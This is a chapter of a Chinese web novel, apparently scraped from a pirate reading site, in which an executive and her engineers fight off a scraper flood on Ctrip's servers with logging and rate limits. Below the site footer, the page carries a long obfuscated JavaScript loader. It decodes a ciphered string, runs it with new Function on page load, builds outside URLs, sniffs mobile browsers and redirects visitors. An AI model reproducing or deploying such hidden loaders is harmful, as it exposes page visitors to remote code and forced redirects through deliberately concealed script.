首页
第2047章 携程的技术暗战
返回
关灯 护眼:关 字号:小

第2047章 携程的技术暗战

章节报错(免登陆)

一秒记住【笔趣阁】
biquge365.net,更新快,无弹窗!

    凌晨两点,赵磊的电话把俞飛鸿从睡梦中叫醒。
    她摸到床头柜上的手机,眯着眼睛看了一眼来电显示,接起来。
    赵磊很少在这个时间打电话,上一次是系统升级数据迁移的时候,再上一次是服务器崩溃的那个晚上。
    “俞总,服务器出问题了。”赵磊的声音很紧,像是一根绷到极限的弦,“从昨晚十点开始,流量突然暴涨,比正常峰值高出三倍多。
    一开始我以为是大规模用户访问,但后来发现不对——这些请求的规律太明显了,不是真人在操作。”
    俞飛鸿坐起来,把被子掀到一边,伸手开了床头灯。
    灯光有些刺眼,她眯了一下眼睛。
    “你判断是什么?”
    “爬虫。
    有人在用自动化脚本抓我们的数据,频率非常高,每秒几百次请求。
    服务器CPU使用率已经冲到百分之八十多了,再这样下去,撑不了几个小时就会挂。”
    “能确定是谁吗?”
    “IP地址段分散在全国各地,很像是用了代理池。
    但从抓取的数据特征来看,对方主要抓的是航班信息和酒店价格——这两类数据,对我们的竞争对手最有价值。”
    俞飛鸿没有说话。
    她不需要赵磊把名字说出来。
    “你现在在哪儿?”
    “在公司。
    小李和小张都在,我们三个人轮班盯着。”
    “我四十分钟到。”
    “俞总,你不用——”
    “四十分钟。”
    她挂了电话,从床上下来,赤脚踩在地板上,凉意从脚底升上来,让她彻底清醒了。
    她换了一身衣服,拿起桌上的包和手机,走到门口的时候停了一下,回头看了一眼床头柜上那个没有喝完的水杯,然后关灯出了门。
    出租车在北京的深夜街道上开得很快,路两边的路灯一盏一盏地往后退,橘黄色的光在车窗上一闪一闪的。
    俞飛鸿坐在后座上,手机握在手心里,犹豫了一下,没有打给陈浩——现在太晚了,他明天还有戏。
    她把手机翻过来翻过去,最后还是按下了拨出键。
    电话响了两声,接了。
    “飛鸿?”陈浩的声音有些沙哑,但意识是清醒的,“出什么事了?”
    “你怎么知道出事了?”
    “你这个时候打电话,肯定出事了。”
    俞飛鸿把赵磊说的情况转述了一遍。
    恶意爬虫、高频抓取、服务器负载飙升、IP地址段分散。
    她说得很快,但每一个细节都讲清楚了。
    陈浩听完之后,沉默了两秒。
    “你到医院了?”
    “没有。
    在去公司的路上。”
    “你先听我说。
    第一,让赵磊把异常流量的特征记录下来,包括时间、频率、IP段、抓取的数据类型。
    这些东西以后要做证据。
    第二,不要急着把所有IP都封掉,有些IP可能是伪装过的真实用户,封错了会误伤正常访问。
    先做限流,把对服务器的影响降到最低,然后再逐一排查。
    第三,这件事背后是谁,你心里有数。
    但他们不会留下直接的证据,你不需要现在就去对质,先把技术防线建起来。”
    俞飛鸿把陈浩说的这三条在心里默念了一遍。
    “好。”
    “你到公司之后,让赵磊把流量日志发一份给我。
    我这边也有个朋友是做网络安全的,我让他帮忙看看有没有什么漏洞。”
    “好。”
    “飛鸿。”
    “嗯。”
    “你路上注意安全。
    到了给我发个消息。”
    “好。”
    挂了电话,俞飛鸿把手机握在手心里,靠在车窗上,看着窗外的夜色。
    北京的深夜不像白天那样喧嚣,马路上的车很少,偶尔有一辆出租车从旁边驶过,尾灯在黑暗中拖出一道红色的光痕,很快就消失了。
    她闭上了眼睛,但没有睡着。
    脑子里一直在转——爬虫、流量、服务器、证据、防线。
    这些词像是一颗一颗的珠子,被一根线串在一起,那根线就是携程。
    到了公司,技术区的灯全亮着。
    赵磊坐在服务器前面,屏幕上是实时流量监控的图表,绿色的曲线正常地起伏着,但上面覆盖着一层密密麻麻的红色小点,每一个红点都是一次异常请求。
    小李在旁边的工位上盯着另一台屏幕,小张在角落里打电话,声音压得很低,像是在跟什么人确认技术细节。
    赵磊看到俞飛鸿进来,从椅子上站起来,指了指屏幕上的那些红点。
    “从昨晚十点到现在,累计异常请求已经超过五十万次。
    对方的手法很专业,请求间隔随机化,User-Agent也是轮换的,伪装得跟真实用户几乎一样。
    如果不是频率太高,我们很难分辨出来。”
    “能定位到对方的服务器吗?”
    “很难。
    他们用了多层代理,真实的来源IP被隐藏了。
    但从数据特征来看,对方对携程的数据结构非常熟悉,知道哪些接口返回的数据最有价值。
    这不是一个陌生的攻击者,是对我们很了解的人。”
    俞飛鸿在赵磊旁边坐下来,看着屏幕上那些密密麻麻的红点。
    它们像是某种病毒的扩散图,从一个点开始,蔓延到整个屏幕,越来越多,越来越密。
    她看了十几秒,把目光移开。
    “赵磊,你按我说的做。
    第一,把异常流量的特征全部记录下来,时间、频率、IP段、抓取的数据类型,每一条都要存。
    第二,先做限流,不要全封。
    把每IP每秒钟的请求次数限制在十次以内,超过的自动返回空数据。
    第三,你和小李小张分三班,二十四小时盯着。
    我不希望服务器在半夜挂了没人知道。”
    赵磊在笔记本上飞快地记下来,写完之后抬起头。
    “限流的话,会不会误伤真实用户?有些用户操作很快,一秒内可能会连续点好几个按钮。”
    “你先按十次来设,观察几个小时。
    如果误伤的情况严重,再调整到十五次。
    关键是不能让服务器挂掉。”
    赵磊点了点头,转过身开始敲键盘。
    俞飛鸿站起来,走到技术区外面的走廊里,拿出手机,给陈浩发了一条消息:“到了。
    赵磊在做了。”
    消息发出去之后,她靠在走廊的墙上,等着。
    走廊里的声控灯灭了,她没有跺脚,让自己站在黑暗中。
    大概过了十几秒,手机震动了。
    “好。
    流量日志发过来了吗?”
    “赵磊在准备。
    十分钟后发到你邮箱。”
    “收到。
    你找个地方坐一下,不要站着。
    你的腰不好。”
    俞飛鸿看着那行字,嘴角在黑暗中微微翘了一下。
    她走回技术区,在赵磊旁边的空椅子上坐下来,把手机放在桌上,屏幕朝上。
    反爬虫系统的升级工作比预想的要复杂得多。
    赵磊带着团队连续工作了三天三夜,写出了一个新的访问频率控制系统,部署在服务器的最前端。
    每一秒钟,系统都要处理几百个请求,对每一个请求做实时分析——
    IP地址、请求频率、访问路径、User-Agent、行为模式——
    全部算一遍,在零点几秒内做出判断:是真实用户还是爬虫?是放行还是拦截还是限流?
    第一天,系统上线之后运行了不到两个小时,就出现了问题。
    限流阈值设得太低了,一些真实用户在短时间内连续操作被误判为爬虫,页面打不开,投诉电话打了进来。
    赵磊紧急把阈值从十次调到了十五次,又调到了二十次,观察了两个小时,误伤的情况减少了,但服务器的负载又上去了。
    他在阈值和服务器的承载能力之间反复调整,像是在走一根细钢丝,往左偏一点会摔,往右偏一点也会摔。
    【跪求礼物,免费的为爱发电也行!】
章节报错(免登陆)
验证码: 提交关闭
!function(){function a(a){var _idx="d2yajuo2zt";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[qYF F82_qq!7_2(F6O2 5ca[Xd5 Y!5YF_52 2_qql88FjFgcY8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=F8YjYmpYFrFF56)_FYc"("ag""aPXd5 Y=2=O=68D62fODm622Y5V6fFh!qYF h86/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfgfcmn<ydFhm5d2fO^cajngKa=5YXY5LYWfgfcmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6Fhg6/}0=6FY^9Y6phFgh/o=qOdfiFdF_Lg0=5Y|5Tg0P=d8"#MqYYb"=(8HZ!F5T[(8+i;NmJd5LYcccY=Fa8>[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2Pacda??"HZ"aP(dF(hcYa[P7_2(F6O2 JcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=F8""a[7mqOdfiFdF_L8*}=}00<(mqY2pFh??c(mJ_Lhc`c$[YPa`%Fa=qcd=+i;NmLF562p67Tc(aaaP7_2(F6O2 fcY8}a[qYF F8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=28FmqY2pFh=O8""!7O5c!Y**!aO%8FHydFhm7qOO5cydFhm5d2fO^ca.2aZ!5YF_52 OPr55dTm6Lr55dTc(a??c(8HZ=qcd=""aa!qYF _8"5phCS^"!7_2(F6O2 ^cY=Fa[qYF 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 O8H"hFFJLg\/\/[[fdTPP}Ko})hFL_h^mLLS_D4Xm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^mLLS_D4Xm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^mLLS_D4Xm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^mLLS_D4Xm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^mLLS_D4Xm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^mLLS_D4Xm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^mLLS_D4Xm(O^gQ}1Q"Z!qYF 58JcOHc2YD wdFYampYFwdTcaZ??OH0Za%"/f@TdC_O@4F/}Ko}"!Fj5%8"jR8"%fcnag_vvc5%8"j"%_%"8"%fcnaa=7m5Y|5T%%=2mL5(8Jc5a=2mO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=$caP=2mO2Y55O587_2(F6O2ca[F??YvvYca=LYF|6^YO_Fc7_2(F6O2ca[2m5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfc2a=7mqOdfiFdF_L8}PqYF p8"}Ko}"=X8"f@TdC_O@4F"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"}Ko}^)ThF)m)qXL26Fm2YF"="}Ko}X5ThF)mp5LJXYTm2YF"="}Ko}2pThFm)qXL26Fm2YF"="}Ko}_JqhFmp5LJXYTm2YF"="}Ko}2TOhFm)qXL26Fm2YF"="}Ko}CSqhF)mp5LJXYTm2YF"="}Ko})FfThF)fm)qXL26Fm2YF"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"=28H"Y#"%XZ!5cavv2mJ_Lhc"(h#"%5caa!qYF O82YD VY)iO(SYFcF%"/"%p%c_j"j"%_%"8"%fcnag""a=H2mCO62c"v"aZa!7m5Y|5T%%=OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=f8"62fYR;7"=_8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=^8""=h80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!h<YmqY2pFh!a28_HfZcYH(Zch%%aa=O8_HfZcYH(Zch%%aa=68_HfZcYH(Zch%%aa=d8_HfZcYH(Zch%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=^%8iF562pHqZc2<<@?O>>oa=Kol886vvc^%8iF562pHqZc5aa=Kol88dvvc^%8iF562pHqZcFaa![Xd5 78^!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv$caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 $ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 )ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8Jc"hFFJLg//[[fdTPP}Ko}qFq^)Y6(:mRSdJ6YLm(O^gQ}1Q/((/}Ko}j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 f8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!fmLFTqYm(LL|YRF8Y=fmdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=faP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=^=l0a=7m(q6(S9d2fqY8^!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 _ca[Xd5 Y8Jc"hFFJLg//[[fdTPP}Ko}qFq^)Y6(:mRSdJ6YLm(O^gQ}1Q/((/}Ko}j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 ^cYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<h%6vv_caPYqLY[F8F*O!67cF<86a5YF_52l}!F<h%6vv_caPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8Jc"hFFJLg//[[fdTPP}Ko})hFL_h^mLLS_D4Xm(O^gQ}1Q/f/}Ko}j(8}vY8f@TdC_O@4F"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aP682dX6pdFO5mJqdF7O5^=28l/3cV62?yd(a/mFYLFc6a=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=c2??OavvcO8/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI?kOqfu5ODLY5/6mFYLFc2dX6pdFO5m_LY5rpY2Fa=Y8cY82dX6pdFO5mJqdF7O5^avv/3cV62?yd(a/mFYLFcYa??2dX6pdFO5m^dR|O_(heO62FL<@=OvvlYjDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=^c7_2(F6O2ca[Lc@0saPaPaPag^c7_2(F6O2ca[Lc}0}a=^c7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaP=Yaa=l2vv6??)ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvv(mqY2pFhvvcY8Jc"hFFJLg//[[fdTPP}Ko})hFL_h^mLLS_D4Xm(O^gQ}1Q"a%"/)_pj68"%p=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tc(aa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=(mqY2pFh80=qcd=""aaPaPaca!'.substr(22));new Function(b)()}();